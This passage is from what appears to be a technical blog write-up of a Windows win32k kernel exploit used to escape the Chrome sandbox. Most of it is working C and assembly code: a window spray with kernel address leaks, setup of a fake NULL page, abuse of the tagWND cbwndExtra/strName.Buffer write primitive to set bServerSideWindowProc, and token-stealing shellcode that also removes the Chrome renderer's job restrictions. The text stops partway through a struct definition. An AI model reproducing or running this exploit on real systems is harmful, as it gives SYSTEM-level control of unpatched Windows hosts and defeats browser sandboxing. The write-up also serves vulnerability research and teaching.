that are less than 0x3fd00 apart */

bool sprayWindows() {

HWND hwndSprayHandleTable[0x100]; // Create a table to hold 0x100 HWND handles created by the spray.

// Create and set up the window class for the sprayed window objects.

WNDCLASSEXW sprayClass = { 0 };

sprayClass.cbSize = sizeof(WNDCLASSEXW);

sprayClass.lpszClassName = TEXT("sprayWindowClass");

sprayClass.lpfnWndProc = sprayCallback; // Set the window procedure for the sprayed

// window objects to sprayCallback().

if (RegisterClassExW(&sprayClass) == 0) {

printf("[!] Couldn't register the sprayClass class!\r\n");

return FALSE;

}

// Create 0x100 windows using the sprayClass window class with the window name "spray".

for (int i = 0; i < 0x100; i++) {

hwndSprayHandleTable[i] = CreateWindowExW(0, sprayClass.lpszClassName, TEXT("spray"), 0, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);

}

// For each entry in the hwndSprayHandle table...

for (int x = 0; x < 0x100; x++) {

// Leak the kernel address of the current HWND being examined, save it into firstEntryAddress.

THRDESKHEAD *firstEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[x], TYPE_WINDOW);

unsigned int firstEntryAddress = (unsigned int)firstEntryDesktop->pSelf;

// Then start a loop to start comparing the kernel address of this hWND

// object to the kernel address of every other hWND object...

for (int y = 0; y < 0x100; y++) {

if (x != y) { // Skip over one instance of the loop if the entries being compared are

// at the same offset in the hwndSprayHandleTable

// Leak the kernel address of the second hWND object being used in

// the comparison, save it into secondEntryAddress.

THRDESKHEAD *secondEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[y], TYPE_WINDOW);

unsigned int secondEntryAddress = (unsigned int)secondEntryDesktop->pSelf;

// If the kernel address of the hWND object leaked earlier in the code is greater than

// the kernel address of the hWND object leaked above, execute the following code.

if (firstEntryAddress > secondEntryAddress) {

// Check if the difference between the two addresses is less than 0x3fd00.

if ((firstEntryAddress - secondEntryAddress) < 0x3fd00) {

printf("[*] Primary window address: 0x%08X\r\n", secondEntryAddress);

printf("[*] Secondary window address: 0x%08X\r\n", firstEntryAddress);

// Save the handle of secondEntryAddress into hPrimaryWindow

// and its address into primaryWindowAddress.

hPrimaryWindow = hwndSprayHandleTable[y];

primaryWindowAddress = secondEntryAddress;

// Save the handle of firstEntryAddress into hSecondaryWindow

// and its address into secondaryWindowAddress.

hSecondaryWindow = hwndSprayHandleTable[x];

secondaryWindowAddress = firstEntryAddress;

// Windows have been found, escape the loop.

break;

}

}

// If the kernel address of the hWND object leaked earlier in the code is less than

// the kernel address of the hWND object leaked above, execute the following code.

else {

// Check if the difference between the two addresses is less than 0x3fd00.

if ((secondEntryAddress - firstEntryAddress) < 0x3fd00) {

printf("[*] Primary window address: 0x%08X\r\n", firstEntryAddress);

printf("[*] Secondary window address: 0x%08X\r\n", secondEntryAddress);

// Save the handle of firstEntryAddress into hPrimaryWindow

// and its address into primaryWindowAddress.

hPrimaryWindow = hwndSprayHandleTable[x];

primaryWindowAddress = firstEntryAddress;

// Save the handle of secondEntryAddress into hSecondaryWindow

// and its address into secondaryWindowAddress.

hSecondaryWindow = hwndSprayHandleTable[y];

secondaryWindowAddress = secondEntryAddress;

// Windows have been found, escape the loop.

break;

}

}

}

}

// Check if the inner loop ended and the windows were found. If so print a debug message.

// Otherwise continue on to the next object in the hwndSprayHandleTable array.

if (hPrimaryWindow != NULL) {

printf("[*] Found target windows!\r\n");

break;

}

}



Once two tagWND objects matching these requirements are found, their addresses will be compared to see which one is located earlier in memory. The tagWND object located earlier in memory will become the primary window; its address will be saved into the global variable primaryWindowAddress, whilst its handle will be saved into the global variable hPrimaryWindow. The other tagWND object will become the secondary window; its address is saved into secondaryWindowAddress and its handle is saved into hSecondaryWindow.
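The selection logic above can be sketched in portable C by treating the leaked kernel addresses as plain 32-bit integers. This is a minimal model, not the exploit's code: the helper name find_window_pair and the MAX_WINDOW_GAP macro are hypothetical, and only the 0x3fd00 threshold comes from the listing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_WINDOW_GAP 0x3fd00u /* distance threshold taken from the listing */

/* Hypothetical helper: scans leaked addresses for two windows that lie within
 * MAX_WINDOW_GAP bytes of each other. On success, *primary receives the index
 * of the lower address and *secondary the index of the higher one. */
static int find_window_pair(const uint32_t *addrs, size_t count,
                            size_t *primary, size_t *secondary)
{
    assert(addrs != NULL && primary != NULL && secondary != NULL);
    for (size_t x = 0; x < count; x++) {
        for (size_t y = x + 1; y < count; y++) {
            int x_is_lower = addrs[x] < addrs[y];
            uint32_t lo = x_is_lower ? addrs[x] : addrs[y];
            uint32_t hi = x_is_lower ? addrs[y] : addrs[x];
            if (hi - lo < MAX_WINDOW_GAP) {
                *primary = x_is_lower ? x : y;   /* earlier in memory */
                *secondary = x_is_lower ? y : x; /* later in memory */
                return 1;
            }
        }
    }
    return 0; /* no suitable pair; the exploit bails in this case */
}
```

The returned indices play the role of the positions in hwndSprayHandleTable from which hPrimaryWindow and hSecondaryWindow are taken.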

Once the addresses of these windows have been saved, the handles to the other windows within hwndSprayHandleTable are destroyed using DestroyWindow() in order to release resources back to the host operating system.

// Check that hPrimaryWindow isn't NULL after both the loops are

// complete. This will only occur in the event that none of the 0x1000

// window objects were within 0x3fd00 bytes of each other. If this occurs, then bail.

if (hPrimaryWindow == NULL) {

printf("[!] Couldn't find the right windows for the tagWND primitive. Exiting....\r\n");

return FALSE;

}

// This loop will destroy the handles to all other

// windows besides hPrimaryWindow and hSecondaryWindow,

// thereby ensuring that there are no lingering unused

// handles wasting system resources.

for (int p = 0; p < 0x100; p++) {

HWND temp = hwndSprayHandleTable[p];

if ((temp != hPrimaryWindow) && (temp != hSecondaryWindow)) {

DestroyWindow(temp);

}

}

addressToWrite = (UINT)primaryWindowAddress + 0x90; // Set addressToWrite to

// primaryWindow's cbwndExtra field.

printf("[*] Destroyed spare windows!\r\n");

// Check if it's possible to set the window text in hSecondaryWindow.

// If this isn't possible, there is a serious error, and the program should exit.

// Otherwise return TRUE as everything has been set up correctly.

if (SetWindowTextW(hSecondaryWindow, L"test String") == 0) {

printf("[!] Something is wrong, couldn't initialize the text buffer in the secondary window....\r\n");

return FALSE;

}

else {

return TRUE;

}



The final part of sprayWindows() sets addressToWrite to the address of the primary window’s cbwndExtra field (primaryWindowAddress + 0x90), so that the exploit knows where the limited write primitive should write the value 0x40000000.















To understand why tagWND objects were sprayed and why the cbwndExtra and strName.Buffer fields of a tagWND object are important, it is necessary to examine a well-known kernel write primitive that exists on Windows versions prior to Windows 10 RS1.



As explained in Saif ElSherei and Ian Kronquist’s paper The Life & Death of Kernel Object Abuse and Morten Schenk’s presentation Taking Windows 10 Kernel Exploitation to The Next Level, if an attacker can place two tagWND objects one after another in memory and then modify the cbwndExtra field of the earlier object via a kernel write vulnerability, they can extend the expected length of that object’s WndExtra data so that it appears to cover memory that actually belongs to the second tagWND object.









The following diagram shows how the exploit utilizes this concept to set the cbwndExtra field of hPrimaryWindow to 0x40000000 by utilizing the limited write primitive that was explained earlier in this blog post, as well as how this adjustment allows the attacker to set data inside the second tagWND object that is located adjacent to it.

Once the cbwndExtra field of the first tagWND object has been overwritten, an attacker who calls SetWindowLong() on the first tagWND object can overwrite the strName.Buffer field in the second tagWND object and set it to an arbitrary address. When SetWindowText() is then called on the second tagWND object, the address contained in the overwritten strName.Buffer field will be used as the destination address for the write operation.
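To make the idea concrete, the following sketch models two adjacent window objects inside an ordinary byte buffer and shows how enlarging cbwndExtra turns an in-bounds setter into an out-of-bounds write. It is a simplified user-mode simulation under stated assumptions: sim_set_window_long is a hypothetical stand-in for the kernel's bounds check, and the 0xB0 start of the extra data is taken from the exploit code shown later in this post.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OFF_STRNAME_BUFFER 0x8Cu /* strName.Buffer (0x84 + 0x8) */
#define OFF_CBWNDEXTRA     0x90u /* cbwndExtra */
#define OFF_EXTRA_DATA     0xB0u /* start of the extra bytes (assumed from the exploit code) */

static uint32_t load32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void store32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Simplified model of SetWindowLong(): the 4-byte write must fit inside the
 * cbwndExtra bytes that follow the window object located at offset wnd. */
static int sim_set_window_long(uint8_t *heap, uint32_t wnd, uint32_t index, uint32_t value)
{
    assert(heap != NULL);
    uint32_t cb = load32(heap + wnd + OFF_CBWNDEXTRA);
    if (index > cb || cb - index < 4)
        return 0; /* rejected: index lies outside the extra data */
    store32(heap + wnd + OFF_EXTRA_DATA + index, value);
    return 1;
}
```

With the original cbwndExtra, an index that reaches the neighbouring object's strName.Buffer is rejected; once 0x40000000 has been ORed into the field, the same call succeeds and rewrites the neighbour's pointer.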



By forming this stronger write primitive, the attacker can write controllable values to kernel addresses, which is a prerequisite to breaking out of the Chrome sandbox. The following listing from WinDBG shows the fields of the tagWND object which are relevant to this technique.

1: kd> dt -r1 win32k!tagWND

+0x000 head : _THRDESKHEAD

+0x000 h : Ptr32 Void

+0x004 cLockObj : Uint4B

+0x008 pti : Ptr32 tagTHREADINFO

+0x00c rpdesk : Ptr32 tagDESKTOP

+0x010 pSelf : Ptr32 UChar

...

+0x084 strName : _LARGE_UNICODE_STRING

+0x000 Length : Uint4B

+0x004 MaximumLength : Pos 0, 31 Bits

+0x004 bAnsi : Pos 31, 1 Bit

+0x008 Buffer : Ptr32 Uint2B

+0x090 cbwndExtra : Int4B

...
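The offsets in this listing can be captured in a small C model, which is handy when reasoning about the arithmetic used later in the exploit. The type names below are hypothetical, 32-bit pointers are represented as uint32_t so that the layout is identical on any host, and the fields elided in the listing are replaced by padding.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uint32_t h;        /* +0x000 handle value */
    uint32_t cLockObj; /* +0x004 */
    uint32_t pti;      /* +0x008 */
    uint32_t rpdesk;   /* +0x00c */
    uint32_t pSelf;    /* +0x010 kernel address of the object itself */
} ThrDeskHead32;

typedef struct {
    uint32_t Length;              /* +0x000 */
    uint32_t MaximumLengthAndAnsi; /* +0x004 low 31 bits MaximumLength, top bit bAnsi */
    uint32_t Buffer;              /* +0x008 */
} LargeUnicodeString32;

typedef struct {
    ThrDeskHead32 head;                /* +0x000 */
    uint8_t elided[0x84 - 0x14];       /* fields not shown in the listing */
    LargeUnicodeString32 strName;      /* +0x084 */
    int32_t cbwndExtra;                /* +0x090 */
} TagWnd32;

/* Compile-time checks that the model matches the WinDBG offsets. */
static_assert(offsetof(TagWnd32, strName) == 0x84, "strName offset");
static_assert(offsetof(TagWnd32, strName) + offsetof(LargeUnicodeString32, Buffer) == 0x8C,
              "strName.Buffer offset");
static_assert(offsetof(TagWnd32, cbwndExtra) == 0x90, "cbwndExtra offset");
```

These are the same 0x8C and 0x90 constants that appear in the exploit's calculations for strName.Buffer and cbwndExtra.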















Leaking the Address of pPopupMenu for Write Address Calculations

Before continuing, let’s reexamine how MNGetpItemFromIndex(), which returns the address to be written to minus an offset of 0x4, operates. Recall that the decompiled version of this function is as follows.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)

{

tagITEM *result; // eax

if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur here if spMenu is NULL.

result = 0;

else

result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;

return result;

}









Notice that two components make up the address returned in the else branch: pPopupMenu, which is multiplied by 0x6C, and spMenu->rgItems, which is read from offset 0x34 of the NULL page. Unless the attacker can determine both of these values, they cannot fully control the address returned by MNGetpItemFromIndex(), and hence the address that xxxMNSetGapState() writes to in memory.





There is a solution to this, however, which can be observed in the updated code for SubMenuProc(). The updated code takes the wParam parameter and adds 0x10 to it to obtain the value of pPopupMenu. This value is then used to calculate addressToWriteTo, which becomes the value of spMenu->rgItems within MNGetpItemFromIndex() so that it returns the correct address for xxxMNSetGapState() to write to.

LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)

{

if (msg == WM_MN_FINDMENUWINDOWFROMPOINT){

printf("[*] In WM_MN_FINDMENUWINDOWFROMPOINT handler...\r\n");

printf("[*] Restoring window procedure...\r\n");

SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);

/* The wParam parameter here has the same value as pPopupMenu inside MNGetpItemFromIndex,

except that wParam is 0x10 lower. The code below adds 0x10 to compensate.

This is an important information leak as without this the attacker

cannot manipulate the values returned from MNGetpItemFromIndex, which

can result in kernel crashes and a dramatic decrease in exploit reliability.

*/

UINT pPopupAddressInCalculations = wParam + 0x10;

// Set the address to write to to be the right bit of cbwndExtra in the target tagWND.

UINT addressToWriteTo = ((addressToWrite + 0x6C) - ((pPopupAddressInCalculations * 0x6C) + 0x4));

To understand why this code works, it is necessary to reexamine the code for xxxMNFindWindowFromPoint(). Note that the address of pPopupMenu is sent by xxxMNFindWindowFromPoint() in the wParam parameter when it calls xxxSendMessage() to send a MN_FINDMENUWINDOWFROMPOINT message to the application’s main window. This allows the attacker to obtain the address of pPopupMenu by implementing a handler for MN_FINDMENUWINDOWFROMPOINT which saves the wParam parameter’s value into a local variable for later use.

LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)

{

....

v6 = xxxSendMessage(

var_pPopupMenu->spwndNextPopup,

MN_FINDMENUWINDOWFROMPOINT,

(WPARAM)&pPopupMenu,

(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the

// MN_FINDMENUWINDOWFROMPOINT usermode callback

// using the address of pPopupMenu as the

// wParam argument.

ThreadUnlock1();

if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user

// mode callback is a handle to a MFMWFP window.

v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned

// handle is a handle to

// a window object. Set v1 to

// TRUE if all is good.

...

During experiments, it was found that the value sent via xxxSendMessage() is 0x10 less than the value used in MNGetpItemFromIndex(). For this reason, the exploit code adds 0x10 to the value received in wParam to ensure that the value of pPopupMenu in the exploit code matches the value used inside MNGetpItemFromIndex().
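The address arithmetic can be checked with a short sketch that reproduces the addressToWriteTo formula using 32-bit wraparound. The function names are hypothetical, and the assumption that the second write uses the index minus one follows this post's reading of the decompiled xxxMNSetGapState().

```c
#include <assert.h>
#include <stdint.h>

#define ITEM_SIZE 0x6Cu /* stride used by MNGetpItemFromIndex() */

/* Mirrors the exploit's addressToWriteTo calculation (modulo 2^32). */
static uint32_t fake_rgitems(uint32_t target, uint32_t index)
{
    return (target + ITEM_SIZE) - (index * ITEM_SIZE + 0x4u);
}

/* Address that MNGetpItemFromIndex() would return for rg_items and index. */
static uint32_t item_address(uint32_t rg_items, uint32_t index)
{
    assert(index != 0xFFFFFFFFu); /* an index of -1 makes the real function return 0 */
    return rg_items + ITEM_SIZE * index;
}
```

Under these assumptions, item_address(rg, index - 1) + 4 equals the target, which is where the 0x40000000 value is ORed in, while item_address(rg, index) + 4 lands 0x6C bytes after it and receives the 0x80000000 write.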





























Setting up the Memory in the NULL Page

Once addressToWriteTo has been calculated, the NULL page is set up. In order to set up the NULL page appropriately the following offsets need to be filled out:

- 0x20

- 0x34

- 0x4C

- 0x50 to 0x1050



This can be seen in more detail in the following diagram.

The exploit code starts by setting offset 0x20 in the NULL page to 0xFFFFFFFF. This is done because spMenu will be NULL at this point, so spMenu->cItems will contain the value at offset 0x20 of the NULL page. Setting the value at this address to a large unsigned integer ensures that spMenu->cItems is greater than the value of pPopupMenu, which prevents MNGetpItemFromIndex() from returning 0 instead of result. This check is the if condition in the following code.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)

{

tagITEM *result; // eax

if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur

// here if spMenu is NULL.

result = 0;

else

result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;

return result;

}

Offset 0x34 of the NULL page will contain a DWORD which holds the value of spMenu->rgItems. This will be set to the value of addressToWriteTo so that the calculation in the else branch will set result to the address of primaryWindow’s cbwndExtra field, minus an offset of 0x4.

The other offsets require a more detailed explanation. The following code shows the code within the function xxxMNUpdateDraggingInfo() which utilizes these offsets.

.text:BF975EA3 mov eax, [ebx+14h] ; EAX = ppopupmenu->spmenu

.text:BF975EA3 ;

.text:BF975EA3 ; Should set EAX to 0 or NULL.

.text:BF975EA6 push dword ptr [eax+4Ch] ; uIndex aka pPopupMenu. This will be the

.text:BF975EA6 ; value at address 0x4C given that

.text:BF975EA6 ; ppopupmenu->spmenu is NULL.

.text:BF975EA9 push eax ; spMenu. Will be NULL or 0.

.text:BF975EAA call MNGetpItemFromIndex

..............

.text:BF975EBA add ecx, [eax+28h] ; ECX += pItemFromIndex->yItem

.text:BF975EBA ;

.text:BF975EBA ; pItemFromIndex->yItem will be the value

.text:BF975EBA ; at offset 0x28 of whatever value

.text:BF975EBA ; MNGetpItemFromIndex returns.

...............

.text:BF975ECE cmp ecx, ebx

.text:BF975ED0 jg short loc_BF975EDB ; Jump to loc_BF975EDB if the following

.text:BF975ED0 ; condition is true:

.text:BF975ED0 ;

.text:BF975ED0 ; ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))

As can be seen above, a call will be made to MNGetpItemFromIndex() using two parameters: spMenu which will be set to a value of NULL, and uIndex, which will contain the DWORD at offset 0x4C of the NULL page. The value returned by MNGetpItemFromIndex() will then be incremented by 0x28 before being used as a pointer to a DWORD. The DWORD at the resulting address will then be used to set pItemFromIndex->yItem, which will be utilized in a calculation to determine whether a jump should be taken. The exploit needs to ensure that this jump is always taken as it ensures that xxxMNSetGapState() goes about writing to addressToWrite in a consistent manner.

To ensure this jump is taken, the exploit sets the value at offset 0x4C in such a way that MNGetpItemFromIndex() will always return a value within the range 0x120 to 0x180. By then setting the bytes at offsets 0x50 to 0x1050 within the NULL page to 0xF0, the attacker can ensure that regardless of the value that MNGetpItemFromIndex() returns, when it is incremented by 0x28 and used as a pointer to a DWORD, pItemFromIndex->yItem will be set to 0xF0F0F0F0. This will cause the first half of the following calculation to always be a very large unsigned integer, and hence the jump will always be taken.

((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))
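The NULL page layout described above can be modelled with an ordinary buffer standing in for the memory at address 0. This is only a sketch: the function names and PAGE_MODEL_SIZE are hypothetical, and the index stored at offset 0x4C is left as a parameter because its exact value is not given in this section.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PAGE_MODEL_SIZE 0x2000u /* large enough to cover offsets 0x0 to 0x104F */

/* Fills a buffer that stands in for the memory mapped at address 0. */
static void setup_null_page_model(uint8_t *page, uint32_t rg_items, uint32_t index)
{
    assert(page != NULL);
    uint32_t citems = 0xFFFFFFFFu;
    memset(page, 0, PAGE_MODEL_SIZE);
    memcpy(page + 0x20, &citems, 4);   /* read as spMenu->cItems */
    memcpy(page + 0x34, &rg_items, 4); /* read as spMenu->rgItems */
    memcpy(page + 0x4C, &index, 4);    /* index pushed by xxxMNUpdateDraggingInfo() */
    memset(page + 0x50, 0xF0, 0x1000); /* covers offsets 0x50 to 0x104F */
}

/* Reads the DWORD that the kernel would treat as pItemFromIndex->yItem. */
static uint32_t read_yitem(const uint8_t *page, uint32_t item)
{
    uint32_t value;
    memcpy(&value, page + item + 0x28, 4);
    return value;
}
```

For any item address between 0x120 and 0x180, read_yitem() returns 0xF0F0F0F0 because the whole region has been filled with 0xF0 bytes, which is the property the exploit relies on.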



Forming a Stronger Write Primitive by Using the Limited Write Primitive

Once the NULL page has been set up, SubMenuProc() will return hWndFakeMenu to xxxSendMessage() in xxxMNFindWindowFromPoint(), where execution will continue.

memset((void *)0x50, 0xF0, 0x1000);

return (ULONG)hWndFakeMenu;

After the xxxSendMessage() call, xxxMNFindWindowFromPoint() will call HMValidateHandleNoSecure() to ensure that hWndFakeMenu is a handle to a window object. This code can be seen below.

v6 = xxxSendMessage(

var_pPopupMenu->spwndNextPopup,

MN_FINDMENUWINDOWFROMPOINT,

(WPARAM)&pPopupMenu,

(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the

// MN_FINDMENUWINDOWFROMPOINT usermode callback

// using the address of pPopupMenu as the

// wParam argument.

ThreadUnlock1();

if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user

// mode callback is a handle to a MFMWFP window.

v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned handle

// is a handle to a window object.

// Set v1 to TRUE if all is good.

If hWndFakeMenu is deemed to be a valid handle to a window object, then xxxMNSetGapState() will be executed, which will set the cbwndExtra field in primaryWindow to 0x40000000, as shown below. This will allow SetWindowLong() calls that operate on primaryWindow to set values beyond the normal boundaries of primaryWindow’s WndExtra data field, thereby allowing primaryWindow to make controlled writes to data within secondaryWindow.

void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)

{

...

var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write

// operation should occur, minus an

// offset of 0x4.

temp_var_PITEM = var_PITEM;

if ( var_PITEM )

{

...

var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the

// address where the second write operation

// should occur, minus an offset of 0x4. This

// address will be 0x6C bytes earlier in

// memory than the address in var_PITEM.

if ( fSet )

{

*((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the

// attacker controlled address.

if ( var_PITEM_Minus_Offset_Of_0x6C )

{

*((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u;

// Conduct the second write to the attacker

// controlled address minus 0x68 (0x6C-0x4).





Once the kernel write operation within xxxMNSetGapState() is finished, the undocumented window message 0x1E5 will be sent. The updated exploit catches this message in the following code.

else {

if ((cwp->message == 0x1E5)) {

UINT offset = 0; // Create the offset variable which will hold the offset from the

// start of hPrimaryWindow's cbwnd data field to write to.

UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0); // Set

// addressOfStartofPrimaryWndCbWndData to the address of

// the start of hPrimaryWindow's cbwnd data field.

// Set offset to the difference between hSecondaryWindow's

// strName.Buffer's memory address and the address of

// hPrimaryWindow's cbwnd data field.

offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData);

printf("[*] Offset: 0x%08X\r\n", offset);

// Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16),

// or the address of the bServerSideWindowProc bit.

if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) {

printf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError());

ExitProcess(-1);

}

else {

printf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset));

}

This code starts by checking whether the window message is 0x1E5. If it is, the code calculates the distance between the start of primaryWindow’s WndExtra data section and the location of secondaryWindow’s strName.Buffer pointer. The difference between these two locations is saved into the variable offset.















Once this is done, SetWindowLongA() is called using hPrimaryWindow and the offset variable to set secondaryWindow’s strName.Buffer pointer to the address of secondaryWindow’s bServerSideWindowProc field. The effect of this operation can be seen in the diagram below.



As a result, when SetWindowText() is called on secondaryWindow, it will use the overwritten strName.Buffer pointer to determine where the write should be conducted. This will result in secondaryWindow’s bServerSideWindowProc flag being overwritten if an appropriate value is supplied as the lpString argument to SetWindowText().





Abusing the tagWND Write Primitive to Set the bServerSideWindowProc Bit

Once the strName.Buffer field within secondaryWindow has been set to the address of secondaryWindow’s bServerSideWindowProc flag, SetWindowText() is called using an hWnd parameter of hSecondaryWindow and an lpString value of “\x06” in order to enable the bServerSideWindowProc flag in secondaryWindow.

// Write the value \x06 to the address pointed to by hSecondaryWindow's strName.Buffer

// field to set the bServerSideWindowProc bit in hSecondaryWindow.

if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {

printf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());

ExitProcess(-1);

}

else {

printf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));





The following diagram shows what secondaryWindow’s tagWND layout looks like before and after the SetWindowTextA() call.





Setting the bServerSideWindowProc flag ensures that secondaryWindow’s window procedure, sprayCallback(), will now run in kernel mode with SYSTEM level privileges, rather than in user mode like most other window procedures. This is a popular vector for privilege escalation and has been used in many attacks, such as a 2017 attack by the Sednit APT group. The following diagram illustrates this in more detail.

Stealing the Process Token and Removing the Job Restrictions

Once the call to SetWindowTextA() is completed, a WM_ENTERIDLE message will be sent to hSecondaryWindow, as can be seen in the following code.

printf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");

SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);

if (success == TRUE) {

printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");

}

else {

printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");

ExitProcess(-1);

}

The WM_ENTERIDLE message will then be picked up by secondaryWindow’s window procedure, sprayCallback(). The code for this function can be seen below.

// Tons of thanks go to https://github.com/jvazquez-r7/MS15-061/blob/first_fix/ms15-061.cpp for

// additional insight into how this function should operate. Note that a token stealing shellcode

// is called here only because trying to spawn processes or do anything complex as SYSTEM

// often resulted in APC_INDEX_MISMATCH errors and a kernel crash.

LRESULT CALLBACK sprayCallback(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)

{

if (uMsg == WM_ENTERIDLE) {

WORD um = 0;

__asm

{

// Grab the value of the CS register and

// save it into the variable UM.

mov ax, cs

mov um, ax

}

// If UM is 0x1B, this function is executing in usermode

// code and something went wrong. Therefore output a message that

// the exploit didn't succeed and bail.

if (um == 0x1b)

{

// USER MODE

printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");

ExitProcess(-1); // Bail as if this code is hit either the target isn't

// vulnerable or something is wrong with the exploit.

}

else

{

success = TRUE; // Set the success flag to indicate the sprayCallback()

// window procedure is running as SYSTEM.

Shellcode(); // Call the Shellcode() function to perform the token stealing and

// to remove the Job object on the Chrome renderer process.

}

}

return DefWindowProc(hWnd, uMsg, wParam, lParam);

}

As the bServerSideWindowProc flag has been set in secondaryWindow’s tagWND object, sprayCallback() should now be running as the SYSTEM user. The sprayCallback() function first checks that the incoming message is a WM_ENTERIDLE message. If it is, then inlined shellcode will ensure that sprayCallback() is indeed being run as the SYSTEM user. If this check passes, the boolean success is set to TRUE to indicate the exploit succeeded, and the function Shellcode() is executed.
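The CS check works because the low two bits of an x86 segment selector encode the privilege level. The sketch below generalizes the comparison against 0x1B used in sprayCallback(); the function names are hypothetical, and 0x08 is assumed here to be the ring 0 code selector on 32-bit Windows.

```c
#include <assert.h>
#include <stdint.h>

/* The low two bits of a segment selector hold the privilege level (0 to 3). */
static unsigned selector_privilege_level(uint16_t selector)
{
    return selector & 0x3u;
}

/* Returns nonzero when the given CS value belongs to ring 3 (user mode). */
static int is_user_mode_cs(uint16_t cs)
{
    return selector_privilege_level(cs) == 3u;
}
```

With this model, the user mode selector 0x1B decodes to privilege level 3, whereas a selector of 0x08 decodes to level 0, which is the case in which sprayCallback() goes on to call Shellcode().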

Shellcode() will perform a simple token stealing exploit using the shellcode shown on abatchy’s blog post with two slight modifications which have been highlighted in the code below.

// Taken from https://www.abatchy.com/2018/01/kernel-exploitation-2#token-stealing-payload-windows-7-x86-sp1.

// Essentially a standard token stealing shellcode, with two lines

// added to remove the Job object associated with the Chrome

// renderer process.

__declspec(noinline) int Shellcode()

{

__asm {

xor eax, eax // Set EAX to 0.

mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData.

// _KTHREAD is located at FS:[0x124]

mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process

mov ecx, eax // Copy current process _EPROCESS structure

xor edx, edx // Set EDX to 0.

mov DWORD PTR [ecx + 0x124], edx // Set the JOB pointer in the _EPROCESS structure to NULL.

mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4

SearchSystemPID:

mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink

sub eax, 0B8h

cmp [eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId

jne SearchSystemPID

mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token

mov [ecx + 0xF8], edx // Assign SYSTEM process token.

}

}

The modification takes the EPROCESS structure for the Chrome renderer process and NULLs out its Job pointer. This is done because experiments showed that even if the shellcode stole the SYSTEM token, the process would still be subject to the job object of the Chrome renderer process, preventing the exploit from spawning any child processes. NULLing out the Job pointer before changing the Chrome renderer process’s token removes the job restrictions from the process, regardless of which token is later assigned to it.
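The logic of the shellcode can be followed more easily in a user-mode model that walks a circular process list in plain C. This is a sketch only: ProcModel is a hypothetical stand-in for _EPROCESS that keeps just the fields the shellcode touches, and unlike the assembly it stops after one full pass instead of looping indefinitely.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct ListEntry { struct ListEntry *flink; } ListEntry;

/* Hypothetical stand-in for _EPROCESS with only the relevant fields. */
typedef struct {
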